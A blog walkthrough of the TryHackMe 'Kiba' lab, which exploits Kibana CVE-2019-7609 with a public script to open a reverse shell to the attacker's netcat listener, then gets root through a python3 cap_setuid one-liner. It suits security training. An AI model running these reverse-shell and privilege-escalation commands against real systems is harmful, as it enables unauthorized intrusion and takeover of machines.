Try Hack Me: Kiba

The skills to be tested and needed to solve this room are: rustscan, CVE, capabilities, privilege escalation, reverse-shell, and nc (netcat).

This room was released today 8/28/2020, and I wanted to try if I can crack it. It took me less than 30 minutes to retrieve the root flag. This is also the first time I’ve exploited linux capabilities to do privilege escalation.

I also chose to mask part of the answers so you will have to do the steps I took and see how things work. I don’t want to take away this learning experience from you.

Shoutout to the room creator, @stuxnet. You can access the room at https://tryhackme.com/room/kiba

I was assigned a victim IP address of 10.10.245.225 to attack. You will be assigned a different IP address, so double check your entries when following this walk-through.

There are seven questions to answer to complete this room:

  1. What is the vulnerability that is specific to programming languages with prototype-based inheritance?
  • P******** P********

2. What is the version of visualization dashboard installed in the server?

  • 6.*.*

3. What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

  • CVE-****-****

4. Compromise the machine and locate user.txt:

  • THM{1*_****_*****_******_****_**e}

5. Capabilities is a concept that provides a security system that allows “divide” root privileges into different values:

  • No answer needed

6. How would you recursively list all of these capabilities?

  • g***** ** *

7. Escalate privileges and obtain root.txt

  • THM{p********_**********_*****_*********s}

Steps:

  1. Google “vulnerability that is specific to programming languages with prototype-based inheritance”

2. Scan the victim IP address using rustscan. Type rustscan -b 500 10.10.245.225

Port 5601 is where the Kibana app is accessible

3. Open a browser and type: 10.10.245.225:5601

4. Go to Management to see the version of the visualization software:

Kibana version

5. Google search for “Kibana CVE”

6. Download the exploit script here. Type: sudo git clone https://github.com/LandGrey/CVE-2019-7609.git

Downloaded the exploit to our attack machine

7. Set up a listener on your attack machine for a reverse-shell connection. Type: nc -nlvp 9999

Listening and waiting for a connection

8. Run the exploit that we just downloaded. Type: python CVE-2019-7609-kibana-rce.py -u http://10.10.245.225:5601 -host 10.2.*.* -port 9999 –shell

  • -u http://10.10.245.225:5601 – is the target URL
  • -host 10.2*.* – this is the remote host for the reverse shell. Use the IP address of your network adapter tun0
  • -port 9999 – this can be any port that you want to use for your listener
  • –shell – this is to initiate a reverse shell
Ran the exploit

9. Go to the listener we set up on our attack machine to verify connection:

We have an initial foothold of the server

10. Do a find for the user.txt. Type: find / -name user.txt 2>/dev/null

User flag location

11. Open the file to retrieve the flag. Type: cat /home/kiba/user.txt

User flag found!

12. The questions 5 and 6 were talking about capabilities, so I am guessing that to escalate our privileges, we will have to exploit capabilities. I haven’t heard of capabilities before, so I went ahead and do sudo -l just to check if our current user has any sudo privileges

Nothing here

13. I did a quick Google search of “linux capabilities.” To check what capabilities are already existing on the victim machine, type: getcap -r / 2>/dev/null. I again added the 2>/dev/null to weed the permission errors from showing up as part of the search results:

  • Here’s a quick glimpse of what the capabilities codes can do:
Image source is from https://hackingarticles.in

14. If we go back to the image on Step 13, the file /home/kiba/.hackmeplease/python3 has a capability name of cap_setuid+ep. And the image above says that cap_setuid “allow changing of the UID”. And if we look at the python3 file, it says that the owner of the file is user root. Meaning we, as user kiba can change our UID to “0”, which is root.

15. Time to exploit the file with capabilities and change user kiba’s UID to root. Type: ./python3 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’

We are ROOT!

16. Find the root flag by again typing: find / -name root.txt 2>/dev/null

Root flag location

17. Open the file root.txt by typing cat /root/root.txt

Root flag found!

Hope you enjoyed and learned something new. Pleas subscribe to my blog to get updates for new contents.

Published by lightkunyagami

https://tryhackme.com/badge/18276

Leave a comment

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: